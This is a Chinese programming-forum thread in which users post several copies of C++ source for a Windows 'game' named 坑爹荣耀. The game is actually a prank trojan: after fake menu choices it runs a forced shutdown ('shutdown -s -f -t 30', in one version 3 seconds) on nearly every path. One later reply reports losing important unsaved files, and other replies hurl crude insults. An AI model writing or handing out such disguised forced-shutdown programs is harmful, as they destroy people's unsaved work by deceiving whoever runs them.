初级光能
#include <iostream>
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main()
{
cout<<"欢迎来到坑爹荣耀"<<endl<<endl;
Sleep(2000);
cout<<"选择版本"<<endl<<endl;
Sleep(2000);
cout<<"坑爹荣耀1.0 (1) 坑爹荣耀2.0 (2)"<<endl<<endl;
int z;
cin>>z;
if(z==1){
int a;
Sleep(2000);
cout<<"欢迎来到坑爹荣耀1.0"<<endl<<endl;
Sleep(2000);
cout<<"选服务器"<<endl<<endl;
Sleep(2000);
cout<<"坑娘荣耀 1"<<" "<<"坑爹荣耀 2"<<" "<<"安全荣耀(测试服) 3"<<endl;
cin>>a;
if(a==1||a==3){
cout<<"你TM还真信了!!!!!!!"<<endl<<endl;
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
cout<<"哈哈哈哈!!!!!!";
}else{
cout<<"你选对了"<<endl<<endl;
cout<<"但是"<<endl<<endl;
cout<<"你的电脑将在30秒后关机!!!!!!";
system("shutdown -s -f -t 30");
cout<<"哈哈哈哈!!!!!!";
}
if(a==0){
cout<<"你赢了,坑不了你"<<endl<<endl;
Sleep(1000);
cout<<"让我帮你关电脑吧!!!!!!";
cout<<"你的电脑将在30秒后关机!!!!!!";
system("shutdown -s -f -t 30");
cout<<"哈哈哈哈!!!!!!";
}
}
if(z==2){
int a;
cout<<"欢迎来到坑爹荣耀2.0"<<endl<<endl;
Sleep(2000);
cout<<"作者: ";
Sleep(1500);
cout<<"高";
Sleep(1500);
cout<<"富";
Sleep(1500);
cout<<"帅"<<endl<<endl;
Sleep(1500);
cout<<"请用数字输入"<<endl<<endl;
Sleep(2000);
cout<<"选服务器"<<endl<<endl;
Sleep(2000);
cout<<"作者最牛 0 "<<"坑娘荣耀 1 "<<"坑爹荣耀 2 "<<"安全荣耀(测试服) 3"<<endl;
cin>>a;
if(a==1||a==3){
cout<<"你TM还真信了!!!!!!!"<<endl<<endl;
Sleep(2000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
Sleep(1000);
cout<<"给你一个机会吧"<<endl<<endl;
Sleep(1500);
cout<<"问你三个问题"<<endl<<endl;
Sleep(1500);
cout<<"(1) 作者牛不牛(牛1,不牛2)"<<endl<<endl;
int b;
cin>>b;
if(b==1){
cout<<"劳资最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
}else{
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
cout<<"(2) 作者帅不帅(帅1,不帅2)"<<endl<<endl;
int c;
cin>>c;
if(c==1){
cout<<"劳资最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
}
else{
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
cout<<"(3) 作者骚不骚(骚1,不骚2)"<<endl<<endl;
int d;
cin>>d;
if(d==1){
cout<<"劳资最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
cout<<"饶你一条狗命"<<endl<<endl;
Sleep(1500);
return 0;
}else{
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
return 0;
}
}if(a==0){
cout<<"你赢了,坑不了你"<<endl<<endl;
Sleep(1000);
cout<<"让劳资帮你关电脑吧!!!!!!"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
cout<<"哈哈哈哈!!!!!!";
}
if(a==2){
cout<<"你选对了"<<endl<<endl;
Sleep(1000);
cout<<"但是"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
}
return 0;
}
新手守护
牛逼!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
中级守护
#include<bits/stdc++.h>
#include<windows.h>
#include<stdlib.h>
using namespace std;
bool key_down(char a)
{
for(int i=1;i<=5;i++)
{
system("cls");
printf("\n\n\n\n\n\n\n\n\n\n\n\n\n 加载中");
Sleep(500);
printf(".");
Sleep(500);
printf(".");
Sleep(500);
printf(".");
Sleep(500);
}
system("cls");
for(int i=1;i<=100;i++)
{
system("cls");
printf("\n\n\n\n\n\n\n\n\n\n\n -----------\n");
printf(" | |\n");
printf(" | %d",i);
if(i<10) cout<<"% |";
if(i>=10&&i<100) cout<<"% |";
if(i==100) cout<<"% |";
printf(" \n");
printf(" | |\n");
printf(" -----------");
Sleep(10);
}
Sleep(2000);
system("cls");
printf("\n\n\n\n\n\n\n\n\n\n\n\n\n ");
Sleep(1000);
printf("加");
Sleep(1000);
printf("载");
Sleep(1000);
printf("成");
Sleep(1000);
printf("功!");
Sleep(2000);
system("cls");
Sleep(1000);
}
int main()
{
cout<<"--------------------------------------"<<endl;
cout<<"| |"<<endl;
cout<<"| |"<<endl;
cout<<"| 欢迎来到坑*荣耀小游戏 |"<<endl;
cout<<"| |"<<endl;
cout<<"| |"<<endl;
cout<<"--------------------------------------";
Sleep(2000);
system("Cls");
cout<<"--------------------------------------"<<endl;
cout<<"| |"<<endl;
cout<<"| |"<<endl;
cout<<"| 欢迎来到坑*荣耀小游戏 |"<<endl;
cout<<"| 请“放心”游玩, |"<<endl;
cout<<"| |"<<endl;
cout<<"--------------------------------------";
Sleep(2000);
system("Cls");
cout<<"--------------------------------------"<<endl;
cout<<"| |"<<endl;
cout<<"| |"<<endl;
cout<<"| 欢迎来到坑*荣耀小游戏 |"<<endl;
cout<<"| 请“放心”游玩, |"<<endl;
cout<<"| 全是关机指令! |"<<endl;
cout<<"--------------------------------------"<<endl;
Sleep(1000);
for(int i=1;i<=100;i++)
{
system("cls");
printf("\n\n\n\n\n\n\n\n\n\n\n -----------\n");
printf(" | |\n");
printf(" | %d",i);
if(i<10) cout<<"% |";
if(i>=10&&i<100) cout<<"% |";
if(i==100) cout<<"% |";
printf(" \n");
printf(" | |\n");
printf(" -----------");
Sleep(10);
}
Sleep(2000);
system("cls");
printf("\n\n\n\n\n\n\n\n\n\n\n\n\n ");
Sleep(1000);
printf("加");
Sleep(1000);
printf("载");
Sleep(1000);
printf("成");
Sleep(1000);
printf("功!");
Sleep(2000);
system("cls");
Sleep(1000);
cout<<"选择版本"<<endl<<endl;
Sleep(2000);
cout<<"坑*荣耀1.0 (1) 坑*荣耀2.0 (2)"<<endl<<endl;
int z;
cin>>z;
if(z==1){
system("Cls");
int a;
Sleep(2000);
cout<<"欢迎来到坑*荣耀1.0"<<endl<<endl;
Sleep(2000);
cout<<"选骂作者器"<<endl<<endl;
Sleep(2000);
cout<<"坑作者荣耀 1"<<" "<<"坑爹荣耀 2"<<" "<<"安全荣耀(测试服) 3"<<endl;
cin>>a;
if(a==1||a==3){
system("Cls");
cout<<"你还真信了!!!!!!!"<<endl<<endl;
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
cout<<"才怪";
system("shutdown -a");
cout<<"哈哈哈哈!!!!!!";
}else{
system("Cls");
cout<<"你选对了"<<endl<<endl;
cout<<"但是"<<endl<<endl;
cout<<"你的电脑将在30秒后关机!!!!!!";
system("shutdown -s -f -t 30");
cout<<"才怪";
system("shutdown -a");
cout<<"哈哈哈哈!!!!!!";
}
if(a==0){
system("Cls");
cout<<"你赢了,坑不了你"<<endl<<endl;
Sleep(1000);
cout<<"让我帮你关电脑吧!!!!!!";
cout<<"你的电脑将在30秒后关机!!!!!!";
system("shutdown -s -f -t 30");
cout<<"才怪";
system("shutdown -a");
cout<<"哈哈哈哈!!!!!!";
}
}
if(z==2){
system("Cls");
int a;
cout<<"欢迎来到坑*荣耀2.0"<<endl<<endl;
Sleep(2000);
cout<<"作者: ";
Sleep(1500);
cout<<"大";
Sleep(1500);
cout<<"傻";
Sleep(1500);
cout<<"*"<<endl<<endl;
Sleep(1500);
cout<<"请用数字输入"<<endl<<endl;
Sleep(2000);
cout<<"选服务器"<<endl<<endl;
Sleep(2000);
cout<<"作者最脑残 0 "<<"坑*荣耀 1 "<<"坑*荣耀 2 "<<"危险荣耀(测试服) 3"<<endl;
cin>>a;
if(a==1||a==3){
system("Cls");
cout<<"你TM还不真信了!!!!!!!"<<endl<<endl;
Sleep(2000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
Sleep(1000);
cout<<"给你一个机会吧"<<endl<<endl;
Sleep(1500);
cout<<"问你三个问题"<<endl<<endl;
Sleep(1500);
cout<<"(1) 作者是不是傻逼(傻逼1,不傻逼2)"<<endl<<endl;
int b;
cin>>b;
if(b==1){
system("Cls");
cout<<"本傻逼最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
}else{
system("Cls");
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
cout<<"(2) 作者脑不脑残(脑残1,不脑残2)"<<endl<<endl;
int c;
cin>>c;
if(c==1){
system("Cls");
cout<<"本傻逼最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
}
else{
system("Cls");
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
cout<<"(3) 作者有没有j j(有1,没有2)"<<endl<<endl;
int d;
cin>>d;
if(d==2){
system("Cls");
cout<<"本公公最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
cout<<"饶你一条狗命"<<endl<<endl;
Sleep(1500);
}else{
system("Cls");
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
}if(a==0){
system("Cls");
cout<<"你赢了,坑不了你"<<endl<<endl;
Sleep(1000);
cout<<"让本儿子帮你关电脑吧!!!!!!"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
cout<<"才怪";
system("shutdown -a");
cout<<"哈哈哈哈!!!!!!";
}
if(a==2){
system("Cls");
cout<<"你选对了"<<endl<<endl;
Sleep(1000);
cout<<"但是"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
cout<<"才怪";
system("shutdown -a");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
}
cout<<"(4) 爸爸!!!(诶1,?2)"<<endl<<endl;
int gg;
cin>>gg;
if(gg==1){
system("Cls");
cout<<"本公公最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
cout<<"饶你一条狗命"<<endl<<endl;
Sleep(1500);
}else{
system("Cls");
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
return 0;
}
新手守护
再搞这种东西,我骂死你!!!(傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼傻逼)
修练者
#include <iostream>//坑爹版,请慎重使用。
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main()
{
cout<<"欢迎来到坑爹荣耀"<<endl<<endl;
Sleep(2000);
cout<<"选择版本"<<endl<<endl;
Sleep(2000);
cout<<"坑爹荣耀1.0 (1) 坑爹荣耀2.0 (2)"<<endl<<endl;
int z;
cin>>z;
if(z==1){
int a;
Sleep(2000);
cout<<"欢迎来到坑爹荣耀1.0"<<endl<<endl;
Sleep(2000);
cout<<"选服务器"<<endl<<endl;
Sleep(2000);
cout<<"坑娘荣耀 1"<<" "<<"坑爹荣耀 2"<<" "<<"安全荣耀(测试服) 3"<<endl;
cin>>a;
if(a==1||a==3){
cout<<"你TM还真信了!!!!!!!"<<endl<<endl;
cout<<"你的电脑将在3秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 3");
cout<<"哈哈哈哈!!!!!!";
}else{
cout<<"你选对了"<<endl<<endl;
cout<<"但是"<<endl<<endl;
cout<<"你的电脑将在3秒后关机!!!!!!";
system("shutdown -s -f -t 3");
cout<<"哈哈哈哈!!!!!!";
}
if(a==0){
cout<<"你赢了,坑不了你"<<endl<<endl;
Sleep(1000);
cout<<"让我帮你关电脑吧!!!!!!";
cout<<"你的电脑将在3秒后关机!!!!!!";
system("shutdown -s -f -t 3");
cout<<"哈哈哈哈!!!!!!";
}
}
if(z==2){
int a;
cout<<"欢迎来到坑爹荣耀2.0"<<endl<<endl;
Sleep(2000);
cout<<"作者: ";
Sleep(1500);
cout<<"高";
Sleep(1500);
cout<<"富";
Sleep(1500);
cout<<"帅"<<endl<<endl;
Sleep(1500);
cout<<"请用数字输入"<<endl<<endl;
Sleep(2000);
cout<<"选服务器"<<endl<<endl;
Sleep(2000);
cout<<"作者最牛 0 "<<"坑娘荣耀 1 "<<"坑爹荣耀 2 "<<"安全荣耀(测试服) 3"<<endl;
cin>>a;
if(a==1||a==3){
cout<<"你TM还真信了!!!!!!!"<<endl<<endl;
Sleep(2000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
Sleep(1000);
cout<<"给你一个机会吧"<<endl<<endl;
Sleep(1500);
cout<<"问你三个问题"<<endl<<endl;
Sleep(1500);
cout<<"(1) 作者牛不牛(牛1,不牛2)"<<endl<<endl;
int b;
cin>>b;
if(b==1){
cout<<"劳资最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
}else{
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在3秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 3");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
cout<<"(2) 作者帅不帅(帅1,不帅2)"<<endl<<endl;
int c;
cin>>c;
if(c==1){
cout<<"劳资最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
}
else{
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在3秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 3");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
cout<<"(3) 作者骚不骚(骚1,不骚2)"<<endl<<endl;
int d;
cin>>d;
if(d==1){
cout<<"劳资最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
cout<<"饶你一条狗命"<<endl<<endl;
Sleep(1500);
system("shutdown -s -f -t 3");
return 0;
}else{
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在3秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 3");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
return 0;
}
}if(a==0){
cout<<"你赢了,坑不了你"<<endl<<endl;
Sleep(1000);
cout<<"让劳资帮你关电脑吧!!!!!!"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在3秒后关机!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 3");
cout<<"哈哈哈哈!!!!!!";
}
if(a==2){
cout<<"你选对了"<<endl<<endl;
Sleep(1000);
cout<<"但是"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在3秒后关机!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 3");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
}
return 0;
}
初级光能
不水!!!
不坑!!!
好!!!
|
|
|
\ | /
\ | /
.
|
|
|
\ | /
\ | /
.
|
|
|
\ | /
\ | /
.
|
|
|
\ | /
\ | /
.
|
|
|
\ | /
\ | /
.
|
|
|
\ | /
\ | /
.
|
|
|
\ | /
\ | /
.
|
|
|
\ | /
\ | /
.
|
|
|
\ | /
\ | /
.
坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑坑
水水水水水水水水水水水水水水水水水水水水水水水水水水水水水水水水水水水水
新手守护
#include <iostream>
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main()
{
cout<<"欢迎来到坑爹荣耀"<<endl<<endl;
Sleep(2000);
cout<<"选择版本"<<endl<<endl;
Sleep(2000);
cout<<"坑爹荣耀1.0 (1) 坑爹荣耀2.0 (2)"<<endl<<endl;
int z;
cin>>z;
if(z==1){
int a;
Sleep(2000);
cout<<"欢迎来到坑爹荣耀1.0"<<endl<<endl;
Sleep(2000);
cout<<"选服务器"<<endl<<endl;
Sleep(2000);
cout<<"坑娘荣耀 1"<<" "<<"坑爹荣耀 2"<<" "<<"安全荣耀(测试服) 3"<<endl;
cin>>a;
if(a==1||a==3){
cout<<"你TM还真信了!!!!!!!"<<endl<<endl;
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
cout<<"哈哈哈哈!!!!!!";
}else{
cout<<"你选对了"<<endl<<endl;
cout<<"但是"<<endl<<endl;
cout<<"你的电脑将在30秒后关机!!!!!!";
system("shutdown -s -f -t 30");
cout<<"哈哈哈哈!!!!!!";
}
if(a==0){
cout<<"你赢了,坑不了你"<<endl<<endl;
Sleep(1000);
cout<<"让我帮你关电脑吧!!!!!!";
cout<<"你的电脑将在30秒后关机!!!!!!";
system("shutdown -s -f -t 30");
cout<<"哈哈哈哈!!!!!!";
}
}
if(z==2){
int a;
cout<<"欢迎来到坑爹荣耀2.0"<<endl<<endl;
Sleep(2000);
cout<<"作者: ";
Sleep(1500);
cout<<"高";
Sleep(1500);
cout<<"富";
Sleep(1500);
cout<<"帅"<<endl<<endl;
Sleep(1500);
cout<<"请用数字输入"<<endl<<endl;
Sleep(2000);
cout<<"选服务器"<<endl<<endl;
Sleep(2000);
cout<<"作者最牛 0 "<<"坑娘荣耀 1 "<<"坑爹荣耀 2 "<<"安全荣耀(测试服) 3"<<endl;
cin>>a;
if(a==1||a==3){
cout<<"你TM还真信了!!!!!!!"<<endl<<endl;
Sleep(2000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
Sleep(1000);
cout<<"给你一个机会吧"<<endl<<endl;
Sleep(1500);
cout<<"问你三个问题"<<endl<<endl;
Sleep(1500);
cout<<"(1) 作者牛不牛(牛1,不牛2)"<<endl<<endl;
int b;
cin>>b;
if(b==1){
cout<<"劳资最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
}else{
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
cout<<"(2) 作者帅不帅(帅1,不帅2)"<<endl<<endl;
int c;
cin>>c;
if(c==1){
cout<<"劳资最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
}
else{
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
cout<<"(3) 作者骚不骚(骚1,不骚2)"<<endl<<endl;
int d;
cin>>d;
if(d==1){
cout<<"劳资最喜欢你这样诚实的人了"<<endl<<endl;
Sleep(1500);
cout<<"饶你一条狗命"<<endl<<endl;
Sleep(1500);
return 0;
}else{
cout<<"你胆真大"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
return 0;
}
}if(a==0){
cout<<"你赢了,坑不了你"<<endl<<endl;
Sleep(1000);
cout<<"让劳资帮你关电脑吧!!!!!!"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
cout<<"哈哈哈哈!!!!!!";
}
if(a==2){
cout<<"你选对了"<<endl<<endl;
Sleep(1000);
cout<<"但是"<<endl<<endl;
Sleep(1000);
cout<<"你的电脑将在30秒后关机!!!!!!"<<endl<<endl;
system("shutdown -s -f -t 30");
Sleep(1000);
cout<<"哈哈哈哈!!!!!!";
}
}
return 0;
}
修练者
我可以举报吗???
我的很重要的文件没保存
它把我文件删了
我可以举报么???
同意的扣1
刘宇航在2021-06-20 22:38:43追加了内容
到10个1我就 举报